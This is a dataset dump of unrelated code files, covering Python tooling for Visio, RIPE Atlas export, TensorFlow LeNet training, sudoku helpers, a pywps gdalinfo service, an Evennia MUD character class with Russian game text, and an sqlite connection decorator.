\"thre1\":5,\n \"thre2\":27,\n \"ratio_min\":1,\n \"ratio_max\":9,\n \"offset_x\":150,\n \"offset_y\":0\n }\n\n }\n def getcfg(self):\n return self.cfg\n def setColorConfig(self,mode = \"red\",color_cfg = None):\n if not color_cfg:\n return None\n self.cfg[mode + \"_config\"] = color_cfg\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"523196702","text":"import clr \nimport System \n\nclr.AddReference(\"Microsoft.Office.Interop.Visio\") \nimport Microsoft.Office.Interop.Visio \nIVisio = Microsoft.Office.Interop.Visio \n\nfrom Records import *\nimport Util\n\ndef Shape_GetFormulas( doc ):\n\n pages = doc.Pages\n page = pages.Add()\n page.NameU = \"SGF\"\n \n shape = page.DrawRectangle(1, 1, 4, 3)\n shape.CellsU[\"Width\"].Formula = \"=(1.0+2.5)\"\n shape.CellsU[\"Height\"].Formula = \"=(0.0+1.5)\"\n\n # BUILD UP THE REQUEST\n items = [\n Shape_GetFormulas_Record(IVisio.VisSectionIndices.visSectionObject, IVisio.VisRowIndices.visRowXFormOut, IVisio.VisCellIndices.visXFormWidth),\n Shape_GetFormulas_Record(IVisio.VisSectionIndices.visSectionObject, IVisio.VisRowIndices.visRowXFormOut, IVisio.VisCellIndices.visXFormHeight)\n ]\n\n # MAP THE REQUEST TO THE STRUCTURES VISIO EXPECTS\n SRCStream = Util.get_new_system_array(System.Int16, len(items)*3)\n for i in xrange(len(items)) :\n SRCStream[i * 3 + 0] = items[i].SectionIndex\n SRCStream[i * 3 + 1] = items[i].RowIndex\n SRCStream[i * 3 + 2] = items[i].CellIndex\n\n # EXECUTE THE REQUEST\n formulas_sa = Util.get_outref_to_system_array(System.Object) \n SRCStream_sa = Util.get_ref_to_system_array(System.Int16,SRCStream) \n shape.GetFormulasU(SRCStream_sa, formulas_sa)\n\n # OUTPUT BACK TO SOMETHING USEFUL \n formulas = Util.get_new_system_array(System.String,formulas_sa.Length)\n formulas_sa.CopyTo(formulas, 0);\n\n shape.Text = System.String.Format(\"Formulas={0},{1}\", formulas[0], formulas[1])\n\n","sub_path":"DotNet/managed_code_interop_vs2010/VS2010_IronPython_Samples/Shape_GetFormulas.py","file_name":"Shape_GetFormulas.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"243268841","text":"import ReID_Dataloader\nfrom person_reid_model import PersonReID\n\n\nweights_path = './model/weights.h5'\ngpu_list = '0'\nperson_reid_extractor = PersonReID(gpu_list=gpu_list, weight_file=weights_path)\n\ndataset = ReID_Dataloader.ReID_Dataset(dataset='combined')\ntrainset, testsets = dataset.create_dataset()\n\nfor testset_name, testset in testsets.items():\n testset.set_feat_func(person_reid_extractor.feature_extraction)\n print('\\n=========> Test on dataset: {} <=========\\n'.format(testset_name))\n testset.eval()\n\n","sub_path":"ReID_Combine.py","file_name":"ReID_Combine.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"233415628","text":"import json\nimport argparse\nimport os\nfrom ripe.atlas.cousteau import Probe, Measurement\nfrom collections import defaultdict\n\n\"\"\" export-to-ixp-jedi.py\n Takes the set of files created by an IP Topology Map run and converts\n them to the structure expected by the IXP Country Jedi to generate the\n visualization and analysis\n\"\"\"\n\ndef dpath(fname):\n return os.path.join(args.datadir, fname)\n\ndef epath(fname):\n return os.path.join(args.exportdir, fname)\n\n\nparser = argparse.ArgumentParser(\"Exports IP Topology Map datafiles into IXP \"\n \"Country Jedi format\")\nparser.add_argument('--datadir', required=True,\n help=\"directory to read files\")\nparser.add_argument('--exportdir', required=True,\n help=\"Directory to save files\")\nargs = parser.parse_args()\n\n\n# Step 1: Read config file and generate config file\nprint(\"Exporting config\")\nif os.path.isfile(epath('config.json')):\n print(\"\\tSkipping, config already exists\")\nelse:\n with open(dpath('config.json')) as in_conf, open(epath('config.json'),\n 'wb') as out_conf:\n config = json.load(in_conf)\n new_conf = {'country': config['PrimaryCountry']}\n json.dump(new_conf, out_conf)\n\n# Step 2: Generate the list of probes\nprint(\"Exporting probe info\")\nif os.path.isfile(epath('probeset.json')):\n print(\"\\tSkipping, probeset already exists\")\nelse:\n with open(dpath('probes.json')) as in_prb, \\\n open(epath('probeset.json'), 'wb') as out_prb:\n in_prb_set = json.load(in_prb)\n out_prb_set = []\n for cc, probe_list in in_prb_set.iteritems():\n for prb in probe_list:\n # Fetch the full info from the probe as we don't keep as much as IXP\n # Jedi needs\n probe_info = Probe(id=prb['id'])\n out_prb_set.append({'country_code': cc,\n 'dists': {},\n 'tags': probe_info.tags,\n 'asn_v4': probe_info.asn_v4,\n 'asn_v6': probe_info.asn_v6,\n 'address_v4': probe_info.address_v4,\n 'address_v6': probe_info.address_v6,\n 'probe_id': probe_info.id,\n 'lat': probe_info.geometry['coordinates'][0],\n 'lon': probe_info.geometry['coordinates'][1]\n })\n\n json.dump(out_prb_set, out_prb)\n\nif os.path.isfile(epath('measurementset.json')):\n print(\"\\tSkipping, measurement file already exists\")\nelse:\n # Step 3a: Read the list of measurements and identify the ones corresponding\n # to the probe-mesh\n print(\"Finding measurements\")\n stage_msm = defaultdict(list)\n with open(dpath('measurements.json')) as in_msm_file:\n msm_dict = json.load(in_msm_file)\n for cc, msm_list in msm_dict.iteritems():\n for msm_id in msm_list:\n msm_info = Measurement(id=msm_id)\n tag, descr = msm_info.description.split(':')\n stage = tag.split('_')[-1]\n stage_msm[stage].append(msm_id)\n\n print(\"Exporting measurements\")\n new_msm_set = set()\n with open(dpath('results.json')) as in_msm_file, \\\n open(epath('measurementset.json'), 'wb') as out_msm_file:\n in_msm = json.load(in_msm_file)\n for cc, msm_list in in_msm.iteritems():\n for old_msm in msm_list:\n if old_msm['msm_id'] in stage_msm['S1']:\n new_msm_set.add((old_msm['dst_name'], old_msm['msm_id']))\n\n print(\"%d measurements to save\" % len(new_msm_set))\n json.dump({'v6': [],\n 'v4': [{'dst': d,\n 'msm_id': m,\n 'type': 'probe-mesh'} for d, m in new_msm_set]},\n out_msm_file)\n\n# Step 4, export the information we have about IXs in the country and feed it\n# into basedata\nprint(\"Exporting updated basedata\")\npeering_lan = {}\nbase = {}\nwith open(dpath('peeringdb-dump.json')) as in_pdb_file,\\\n open(epath('basedata.json')) as in_base_file:\n pdb = json.load(in_pdb_file)\n base = json.load(in_base_file)\n # Iterate over the list of IXs and generate a structure suitable for\n # basedata\n for ix in pdb:\n if ix['country'] in base['countries']:\n peering_lan[ix['name']] = {'peeringlans': ix['ixpfx']}\n\n# Overwrite the ixps entry in the basedata\nbase['ixps'] = peering_lan\nwith open(epath('basedata.json'), 'wb') as out_base_file:\n json.dump(base, out_base_file, indent=2)\n","sub_path":"export-to-ixp-jedi.py","file_name":"export-to-ixp-jedi.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"556103902","text":"import tensorflow as tf\nfrom tensorflow.contrib.layers import flatten\nfrom .traffic_data import TrafficDataSets\nfrom .data_explorer import TrainingPlotter\nimport logging.config\nlogging.config.fileConfig('logging.conf')\n\nclass Lenet(object):\n\n def __init__(self, traffic_dataset, name, epochs=100, batch_size=500):\n self.plotter = TrainingPlotter(\"Lenet \" + name,\n './model_comparison/Lenet_{}_{}.png'.format(name, TrainingPlotter.now_as_str()),\n show_plot_window=False)\n self.epochs = epochs\n self.batch_size = batch_size\n self.label_size = TrafficDataSets.NUMBER_OF_CLASSES\n\n self.traffic_datas = traffic_dataset\n\n logging.info(\"training data {}\".format(len(traffic_dataset.train.images)))\n\n # consists of 32x32xcolor_channel\n color_channel = traffic_dataset.train.images.shape[3]\n self.x = tf.placeholder(tf.float32, (None, 32, 32, color_channel))\n\n self.y = tf.placeholder(tf.float32, (None, self.label_size))\n self.network = Lenet._LeNet(self, self.x, color_channel)\n\n self.loss_op = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(self.network, self.y))\n self.opt = tf.train.AdamOptimizer()\n self.train_op = self.opt.minimize(self.loss_op)\n\n # LeNet architecture:\n # INPUT -> CONV -> ACT -> POOL -> CONV -> ACT -> POOL -> FLATTEN -> FC -> ACT -> FC\n # create the LeNet and return the result of the last fully connected layer.\n def _LeNet(self, x, color_channel):\n # x is 32, 32, 3\n # Reshape from 2D to 4D. This prepares the data for\n # convolutional and pooling layers.\n # x = tf.reshape(x, (-1, 32, 32, 3))\n # Pad 0s to 32x32. Centers the digit further.\n # Add 2 rows/columns on each side for height and width dimensions.\n # x = tf.pad(x, [[0, 0], [2, 2], [2, 2], [0, 0]], mode=\"CONSTANT\")\n\n # 28x28x6\n conv1_W = tf.Variable(tf.truncated_normal(shape=(5, 5, color_channel, 6)))\n conv1_b = tf.Variable(tf.zeros(6))\n conv1 = tf.nn.conv2d(x, conv1_W, strides=[1, 1, 1, 1], padding='VALID') + conv1_b\n\n conv1 = tf.nn.relu(conv1)\n\n # 14x14x6\n conv1 = tf.nn.max_pool(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n # 10x10x16\n conv2_W = tf.Variable(tf.truncated_normal(shape=(5, 5, 6, 16)))\n conv2_b = tf.Variable(tf.zeros(16))\n conv2 = tf.nn.conv2d(conv1, conv2_W, strides=[1, 1, 1, 1], padding='VALID') + conv2_b\n\n conv2 = tf.nn.relu(conv2)\n\n # 5x5x16\n conv2 = tf.nn.max_pool(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n # Flatten\n fc1 = flatten(conv2)\n # (5 * 5 * 16, 120)\n fc1_shape = (fc1.get_shape().as_list()[-1], 512)\n\n fc1_W = tf.Variable(tf.truncated_normal(shape=(fc1_shape)))\n fc1_b = tf.Variable(tf.zeros(512))\n fc1 = tf.matmul(fc1, fc1_W) + fc1_b\n fc1 = tf.nn.relu(fc1)\n\n fc2_W = tf.Variable(tf.truncated_normal(shape=(512, self.label_size)))\n fc2_b = tf.Variable(tf.zeros(self.label_size))\n return tf.matmul(fc1, fc2_W) + fc2_b\n\n def eval_data(self, dataset):\n \"\"\"\n Given a dataset as input returns the loss and accuracy.\n \"\"\"\n # If dataset.num_examples is not divisible by BATCH_SIZE\n # the remainder will be discarded.\n # Ex: If BATCH_SIZE is 64 and training set has 55000 examples\n # steps_per_epoch = 55000 // 64 = 859\n # num_examples = 859 * 64 = 54976\n #\n # So in that case we go over 54976 examples instead of 55000.\n correct_prediction = tf.equal(tf.argmax(self.network, 1), tf.argmax(self.y, 1))\n accuracy_op = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n steps_per_epoch = dataset.num_examples // self.batch_size\n num_examples = steps_per_epoch * self.batch_size\n total_acc, total_loss = 0, 0\n sess = tf.get_default_session()\n for step in range(steps_per_epoch):\n batch_x, batch_y = dataset.next_batch(self.batch_size)\n loss, acc = sess.run([self.loss_op, accuracy_op], feed_dict={self.x: batch_x, self.y: batch_y})\n total_acc += (acc * batch_x.shape[0])\n total_loss += (loss * batch_x.shape[0])\n return total_loss / num_examples, total_acc / num_examples\n\n def train(self):\n with tf.Session() as sess:\n sess.run(tf.initialize_all_variables())\n steps_per_epoch = self.traffic_datas.train.num_examples // self.batch_size\n\n # Train model\n for i in range(self.epochs):\n for step in range(steps_per_epoch):\n batch_x, batch_y = self.traffic_datas.train.next_batch(self.batch_size)\n loss = sess.run(self.train_op, feed_dict={self.x: batch_x, self.y: batch_y})\n self.plotter.add_loss_accuracy_to_plot(i, loss, None, None, None, redraw=False)\n\n val_loss, val_acc = self.eval_data(self.traffic_datas.validation)\n logging.info(\"EPOCH {} Validation loss = {:.3f} accuracy = {:.3f}\".format(i + 1, val_loss, val_acc))\n self.plotter.add_loss_accuracy_to_plot(i, loss, None, val_loss, val_acc, redraw=True)\n\n # Evaluate on the test data\n test_loss, test_acc = self.eval_data(self.traffic_datas.test)\n logging.info(\"Test loss = {:.3f} accuracy = {:.3f}\".format(test_loss, test_acc))\n\n self.plotter.safe_shut_down()\n","sub_path":"traffic/traffic_lenet.py","file_name":"traffic_lenet.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"639984335","text":"rows = 'ABCDEFGHI'\ncols = '123456789'\n\ngrid1 = '2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'\ngrid2 = '9.1....8.8.5.7..4.2.4....6...7......5..............83.3..6......9................'\ngrid3 = '1....................2......3.....4..............5.......6.....7..8.............9'\n\n# helper function:\n# given two strings (a and b), func will return the list formed by all the\n# possible concatenations of a letter s in string a with a letter t in string b\ndef cross(a,b):\n return [s+t for s in a for t in b]\n\nboxes = cross(rows, cols)\n# returns sudoku board\n\nrow_units = [cross(r, cols) for r in rows]\n# element example:\n# row_units[0] = ['A1', 'A2', 'A3', 'A4', 'A5', 'A6', 'A7', 'A8', 'A9']\n\ncolumn_units = [cross(rows, c) for c in cols]\n# element example:\n# column_units[0] = ['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1', 'H1', 'I1']\n\nsquare_units = [cross(rs, cs) for rs in ('ABC','DEF','GHI') for cs in ('123','456','789')]\n# element example:\n# square_units[0] = ['A1', 'A2', 'A3', 'B1', 'B2', 'B3', 'C1', 'C2', 'C3']\n\ndiagonal_units = [[r+c for r,c in zip(rows,cols)],[r+c for r,c in zip(rows, cols[::-1])]]\n# element example:\n# diagonal_units[0] = ['A1', 'B2', 'C3', 'D4', 'E5', 'F6', 'G7', 'H8', 'I9']\n\n\nunitlist = row_units + column_units + square_units + diagonal_units\nunits = dict((s, [u for u in unitlist if s in u]) for s in boxes)\npeers = dict((s, set(sum(units[s],[]))-set([s])) for s in boxes)\n# set is an unordered collection of items. Every element is unique\n# (no duplicates) and must be immutable (which cannot be changed)\n# sum adds the items of an iterable and returns the sum\n","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"59443721","text":"import subprocess\nfrom pathlib import Path\n\nfrom pywps import FORMATS, UOM\nfrom pywps.app import Process\nfrom pywps.inout import LiteralOutput\nfrom .process_defaults import process_defaults, LiteralInputD\nfrom pywps.app.Common import Metadata\nfrom pywps.response.execute import ExecuteResponse\nfrom processes import process_helper\nimport processes.io_generator as iog\n\nimport osgeo\n\n\nclass GdalInfo(Process):\n def __init__(self):\n process_id = 'gdalinfo'\n defaults = process_defaults(process_id)\n\n inputs = iog.p(defaults, default='--formats')\n\n outputs = [LiteralOutput('output', 'gdalinfo output', data_type='string')]\n\n super().__init__(\n self._handler,\n identifier=process_id,\n version='1.0.0',\n title='gdalinfo',\n abstract='gdalinfo',\n profile='',\n metadata=[Metadata('raster', 'vector')],\n inputs=inputs,\n outputs=outputs,\n store_supported=True,\n status_supported=True\n )\n\n def _handler(self, request, response: ExecuteResponse):\n p = process_helper.get_input_data_array(request.inputs['p'])\n\n osgeo_path = Path(osgeo.__file__).parent\n gdalinfo_path = osgeo_path / \"gdalinfo\"\n output = subprocess.Popen([gdalinfo_path, *p], stdout=subprocess.PIPE).communicate()[0].decode(\"utf-8\")\n\n response.outputs['output'].data_format = FORMATS.JSON\n response.outputs['output'].data = output\n\n return response\n","sub_path":"processes/gdalinfo.py","file_name":"gdalinfo.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"271876131","text":"'''\nSay you have an array for which the ith element is the price of a given stock on day i.\n\nIf you were only permitted to complete at most one transaction (i.e., buy one and sell one share of the stock), design an algorithm to find the maximum profit.\n\nNote that you cannot sell a stock before you buy one.\n\nExample 1:\n\nInput: [7,1,5,3,6,4]\nOutput: 5\nExplanation: Buy on day 2 (price = 1) and sell on day 5 (price = 6), profit = 6-1 = 5.\n Not 7-1 = 6, as selling price needs to be larger than buying price.\nExample 2:\n\nInput: [7,6,4,3,1]\nOutput: 0\nExplanation: In this case, no transaction is done, i.e. max profit = 0.\n\n'''\n\n\n#O(n^2), space O(n)\ndef maxProfit_BruteForce(prices):\n maxProfit = 0 \n for i in range(len(prices)): \n for j in range(i+1, len(prices)): \n profit = prices[j] - prices[i]\n if profit > maxProfit: \n maxProfit = profit \n return maxProfit \n\n#O(n)(loop once), space O(1)(2 variable)\ndef maxProfit(prices): \n if len(prices) > 0: \n lowest,profit = prices[0],0\n for i in range(1,len(prices)): \n if prices[i] < lowest: \n lowest = prices[i]\n elif ((prices[i] - lowest) > profit): \n profit = prices[i] - lowest\n else: \n profit = 0 \n \n return profit \n\n#O(n) space 0(1)\ndef maxProfit2(prices): \n profit,low = 0, float('inf') \n for curr_price in prices: \n if curr_price < low: \n low = curr_price \n else: \n profit = max(curr_price-low,profit)\n return profit\n\np = [7,1,5,3,6,4]\n#return 5 since its the maxprofit\n#print(maxProfit(p)) \n#print(maxProfit_BruteForce(p))\nprint(maxProfit2(p))\n\n''' \ncheck if there are prices in the list\nset the lowest to the first element of the list and initalize profit \nloop through the second element of the list to the end \n if the curr element of the list is less than the first element of the list,\n set lowest to that \n if not then, check if the curr element of the list minus the lowest (first ele) is more than\n profit, if so set profit to that\nelse if there are no prices, return profit 0 since it is the biggest \nreturn profit \n''' ","sub_path":"LeetCode/BestTimetoBuy&SellStocks.py","file_name":"BestTimetoBuy&SellStocks.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"247258259","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCharacters\n\nCharacters are (by default) Objects setup to be puppeted by Players.\nThey are what you \"see\" in game. The Character class in this module\nis setup to be the \"default\" character type created by the default\ncreation commands.\n\n\"\"\"\nfrom evennia import DefaultCharacter\nimport random\nfrom typeclasses.objects import Object\nfrom evennia import create_object\nfrom django.conf import settings\nfrom evennia import TICKER_HANDLER as tickerhandler\nfrom evennia.utils import delay\nfrom evennia import gametime\n\nclass Character(DefaultCharacter):\n \"\"\"\n The Character defaults to implementing some of its hook methods with the\n following standard functionality:\n\n at_basetype_setup - always assigns the DefaultCmdSet to this object type\n (important!)sets locks so character cannot be picked up\n and its commands only be called by itself, not anyone else.\n (to change things, use at_object_creation() instead)\n at_after_move - launches the \"look\" command\n at_post_puppet(player) - when Player disconnects from the Character, we\n store the current location, so the \"unconnected\" character\n object does not need to stay on grid but can be given a\n None-location while offline.\n at_pre_puppet - just before Player re-connects, retrieves the character's\n old location and puts it back on the grid with a \"charname\n has connected\" message echoed to the room\n\n \"\"\"\n #религии\n avaible_religions = [\"христианство\",\"буддизм\",\"сатанизм\",\"масульманизм\"]\n poket_money_amount = 10\n\n def at_object_creation(self):\n #прикручиваем руку\n self.db.hands = create_object(settings.BASE_OBJECT_TYPECLASS, \"hands\")\n #прикручиваем фраги\n self.db.frags = 0\n #прикручиваем количество смертей\n self.db.death_count = 0\n #прикручиваем хеш ээфектов\n self.db.effects = {} \n #ассоциация с хатой.\n self.db.flat = None\n #прикручивам группу\n self.db.party = []\n #прикручиваем лидера группы\n self.db.party_leader = None\n #прикручиваем деньги\n self.db.money = 3\n #прикручиваем религию\n self.db.religion = \"атеист\"\n #прикручиваем предыдущую локацию\n self.db.last_location = None\n\n def return_appearance(self, looker):\n \"\"\"\n This formats a description. It is the hook a 'look' command\n should call.\n\n Args:\n looker (Object): Object doing the looking.\n \"\"\"\n if not looker:\n return\n # get and identify all objects\n visible = (con for con in self.contents if con != looker and\n con.access(looker, \"view\"))\n exits, users, things = [], [], []\n for con in visible:\n key = con.get_display_name(looker)\n if con.destination:\n exits.append(key)\n elif con.has_player:\n users.append(\"{c%s{n\" % key)\n else:\n things.append(key)\n\n in_hands = (con for con in self.db.hands.contents if con != looker and\n con.access(looker, \"view\"))\n thing = []\n for con in in_hands:\n key = con.get_display_name(looker)\n if con:\n thing.append(key) \n # get description, build string\n string = \"{c%s{n\\n\" % self.get_display_name(looker)\n desc = self.db.desc\n if desc:\n string += \"%s\" % desc\n if exits:\n string += \"\\n{wВыходы:{n \" + \", \".join(exits)\n if users or things:\n string += \"\\n{wТы видишь:{n \" + \", \".join(users + things)\n if thing:\n string += \"\\n{wВ руках:{n \" + \", \".join(thing)\n return string\n\n\n def at_after_move(self, source_location):\n super(Character, self).at_after_move(source_location) \n if self.location.key == (u\"Сычевальня\"):\n bugurts = [u\"ПОЧЕМУ У МЕНЯ НЕТ ТЯН... РАЗВЕ Я ТАК МНОГО ПРОШУ...\", u\"ТРИЖДЫБЛЯДСКАЯ ЯРОСТЬ\"]\n self.execute_cmd(\"сказать \" + random.choice(bugurts))\n\n #выходит в окно если под веществами\n if self.location.key == (u\"Сычевальня\"):\n if self.db.effects:\n if len(self.db.effects) > 0:\n out = self.search(\"Преддворая территория\",global_search=True,quiet=True)\n if out:\n dest = out[0]\n self.move_to(dest,quiet=True)\n self.msg(\"Ты был под веществами. Ты перепутал окно с ковром и вышел в него.\")\n self.at_die()\n else:\n self.msg(\"Ты был под веществами. Тебе привиделась Алиска и вы вскрылись.\")\n self.at_die()\n\n #получаем от мамаки ежедневные карманные деньги.\n your_mom = self.search(True, location=self.location, attribute_name = 'is_mom', quiet=True)\n if your_mom:\n mom = your_mom[0]\n if (gametime.gametime() - mom.db.last_payout) >= (24*60)*60:\n self.db.money = self.db.money + self.poket_money_amount\n self.msg(\"Мамка дала тебе %s денег.\" % self.poket_money_amount)\n mom.db.last_payout = gametime.gametime() \n\n def announce_move_from(self, destination):\n \"\"\"\n Called if the move is to be announced. This is\n called while we are still standing in the old\n location.\n\n Args:\n destination (Object): The place we are going to.\n\n \"\"\"\n if not self.location:\n return\n name = self.name\n loc_name = \"\"\n loc_name = self.location.name\n dest_name = destination.name\n string = \"%s уходит из %s, направляясь в %s.\"\n self.location.msg_contents(string % (name, loc_name, dest_name), exclude=self)\n\n #пердыдущая локация\n self.db.last_location = self.location\n\n\n def announce_move_to(self, source_location):\n \"\"\"\n Called after the move if the move was not quiet. At this point\n we are standing in the new location.\n\n Args:\n source_location (Object): The place we came from\n\n \"\"\"\n\n name = self.name\n if not source_location and self.location.has_player:\n # This was created from nowhere and added to a player's\n # inventory; it's probably the result of a create command.\n string = \"Теперь у тебя есть в распоряжении %s.\" % name\n self.location.msg(string)\n return\n\n src_name = \"nowhere\"\n loc_name = self.location.name\n if source_location:\n src_name = source_location.name\n string = \"%s пришел в %s из %s.\"\n self.location.msg_contents(string % (name, loc_name, src_name), exclude=self)\n #обоработка группы\n party = self.db.party\n if party:\n for member in party:\n player = self.search(member, global_search=True,nofound_string=\"Сопартиец %s не найден!\" % member)\n if not player:\n return\n if player and player.has_player:\n player.location.msg_contents(\"%s последовал за лидером %s\" % (player.key, self.key))\n player.move_to(self.location)\n player.msg(\"Ты последовал за лидером - %s. Вы отправились в %s\" % (self.key, self.location.name))\n\n\n def at_die(self):\n \"\"\"\n Хук смерти игрока. Создает труп, скидывает в него вещи, деньги, переносит игрока в лимб.\n \"\"\"\n #создаем труп\n corpse = create_object(Corpse,self.key, location=self.location)\n #денюшки\n if self.db.money:\n corpse.db.money = self.db.money\n self.db.money = 0\n #corpse.key = \"Труп %s\" % self.key\n descriptions = [\"Изуродованный труп %s\" % self.key,\n \"Бренное тело %s\" % self.key,\n \"Останки %s\" % self.key,\n \"Все, что оcталось от %s\" % self.key]\n corpse.db.desc = random.choice(descriptions)\n #скидываем внего вещи\n items = self.contents\n if items:\n for item in items:\n item.move_to(corpse, quiet=True)\n if self.db.hands:\n in_hands = self.db.hands.contents\n if in_hands:\n item = in_hands[0]\n item.move_to(corpse,quiet=True)\n #сбарсываем пати, если ты умер, или умер лидер\n leader = self.db.party_leader\n party = self.db.party\n \n if party:\n for member in party:\n player = self.search(member, global_search=True,nofound_string=\"Сопартиец %s не найден!\" % member)\n if not player:\n return\n player.db.party_leader = None\n player.msg(\"Ваш лидер погиб и ваша группа распалась.\")\n self.db.party = []\n self.msg(\"Твоя группа распалась.\")\n\n if leader:\n your_leader = self.search(leader, global_search=True,nofound_string=\"Лидер %s не найден!\" % leader)\n your_leader.db.party.remove(self.key)\n your_leader.msg(\"%s погиб и вышел и твой группы.\" % self.key)\n self.db.party_leader = None\n self.msg(\"Ты покинул группу %s\" % your_leader.key)\n\n # задрежка\n delay(5, callback=self.TelToLimb)\n\n def TelToLimb(self):\n #телепортируем персонажа в лимб\n #limbs = self.search(\"Limbo\", global_search=True, quiet=True,nofound_string=\"Бога нет, и рая нет!\" )\n limbs = self.search(True, global_search=True, attribute_name = 'after_death', quiet=True,nofound_string=\"Бога нет, и рая нет!\" )\n\n\n if limbs:\n limb = limbs[0]\n self.move_to(limb, quiet=True)\n else:\n self.msg(\"Ты не смог попасть в рай. Потому что его нет! Где твой Бог теперь?\")\n\n\n\nclass Corpse(Character):\n \"\"\"\n Класс трупа игрока. Будет создаваться когда игрок умирает и исчезать через 3 минуты.\n \"\"\"\n def at_object_creation(self):\n self.db.is_corpse = True\n self.db.hands = create_object(settings.BASE_OBJECT_TYPECLASS, \"hands\")\n #создаем таймер для трупа\n tickerhandler.add(self, 60*3)\n def at_tick(self):\n #уничтожает все свои вещи и самовыпиливается\n self.location.msg_contents(\"Прах игрока %s исчезает у тебя на глазах\" % self.key)\n items = self.contents\n if items:\n for item in items:\n item.delete()\n self.delete()\n\n def return_appearance(self, looker):\n \"\"\"\n This formats a description. It is the hook a 'look' command\n should call.\n\n Args:\n looker (Object): Object doing the looking.\n \"\"\"\n if not looker:\n return\n # get and identify all objects\n visible = (con for con in self.contents if con != looker and\n con.access(looker, \"view\"))\n exits, users, things = [], [], []\n for con in visible:\n key = con.get_display_name(looker)\n if con.destination:\n exits.append(key)\n elif con.has_player:\n users.append(\"{c%s{n\" % key)\n else:\n things.append(key)\n if self.db.hands:\n in_hands = (con for con in self.db.hands.contents if con != looker and\n con.access(looker, \"view\"))\n thing = []\n for con in in_hands:\n key = con.get_display_name(looker)\n if con:\n thing.append(key) \n # get description, build string\n string = \"{C%s{n\\n\" % self.get_display_name(looker)\n desc = self.db.desc\n if desc:\n string += \"%s\" % desc\n if exits:\n string += \"\\n{wВыходы:{n \" + \", \".join(exits)\n if users or things:\n string += \"\\n{wТы видишь:{n \" + \", \".join(users + things)\n if thing:\n string += \"\\n{wВ руках:{n \" + \", \".join(thing)\n return string\n","sub_path":"typeclasses/characters.py","file_name":"characters.py","file_ext":"py","file_size_in_byte":13673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"211312934","text":"#!/usr/bin/env python\nimport sqlite3\nimport time\nimport bottle\n\n'''\nCreates a database connection.\n\nConnection can potentially be temporarily blocked by \"EXCLUSIVE\"\nsetting (used for writes). If the connection is blocked, a retry will happen\nafter a specified period of time up to a max trycount before failure.\n\ndb_connect decorator can be used to provide a connection to only those\nroutes which need it.\n\n'''\n\ndef db_connect(db=None, exclusive=False):\n '''Connection decorator for use in routes.\n\n Args:\n db:(str) Path/name of sqlite3 database.\n exclusive:(Boolean) \"True\" to connect using exclusive mode.\n '''\n def decorator(func):\n def wrapper(*args, **kwargs):\n if db is None:\n raise bottle.HTTPError(500, 'Database not specified.')\n dbcon = DB_Connection(db, exclusive)\n connection = dbcon.connection\n kwargs['conn'] = connection \n exec_func = func(*args, **kwargs)\n #close connection after callback executed\n connection.close()\n return exec_func\n return wrapper\n return decorator\n\nclass DB_Connection(object):\n\n def __init__(self, db, exclusive=False):\n self.database = db\n self.trycount = 0\n self.exclusive = exclusive\n\n # 5 second max delay\n self.retry_delay = .05\n self.max_trycount = 100\n \n @property \n def connection(self):\n '''Returns database connection'''\n connection = self._try_db()\n #set exclusive lock for write connections\n if self.exclusive is True:\n connection.isolation_level = 'EXCLUSIVE'\n connection.execute('BEGIN EXCLUSIVE')\n return connection\n\n def _try_db(self):\n '''\n Repeatedly tries database connection until failure limits reached.\n\n Returns:\n sqlite3 database connection.\n Raises:\n DB_Connection_Error\n '''\n if self.trycount > self.max_trycount:\n raise bottle.HTTPError(500, 'Database connection attempts timed out.')\n dbc = self.__connectdb()\n if dbc is None:\n time.sleep(self.retry_delay)\n self.trycount += 1\n return self._try_db()\n return dbc\n\n def __connectdb(self):\n try:\n dbc = sqlite3.connect(self.database)\n return dbc\n except sqlite3.OperationalError:\n return None\n except:\n raise bottle.HTTPError(500, 'Cannot connect to database.')\n\n","sub_path":"plugins/db_connection.py","file_name":"db_connection.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"349571462","text":"import numpy as np \nimport matplotlib.pyplot as plt\nimport os\nimport pdb\n\n##### BEGIN USER INPUT #####\n\ndataDir = \"/home/chris/Research/GEMS_runs/prf_nonlinManifold/pyGEMS/standingFlame/dataProc/40microsec\" \t# base dir where bases for particular dataset are stored\n# singValsFile = \"podData_cons_vector_test/singularValues_0123.npy\"\t\t\t\t\t\t\t\t\t\t\t# continuation of dataDir to singular values file\n# singValsFile = \"podData_cons_scalar_samp1/singularValues_0_1_2_3.npy\"\nsingValsFile = \"podData_cons_scalar_test/singularValues_0_123.npy\"\nlBound = 1\nuBound = 200\n\n##### END USER INPUT #####\n\n# load and check bounds\ninDir = os.path.join(dataDir, singValsFile)\nsingVals = np.load(inDir, allow_pickle=True)\n\njagged = False\n# if jagged array, will come in as a list of arrays\nif (singVals.ndim == 1):\n\tjagged = 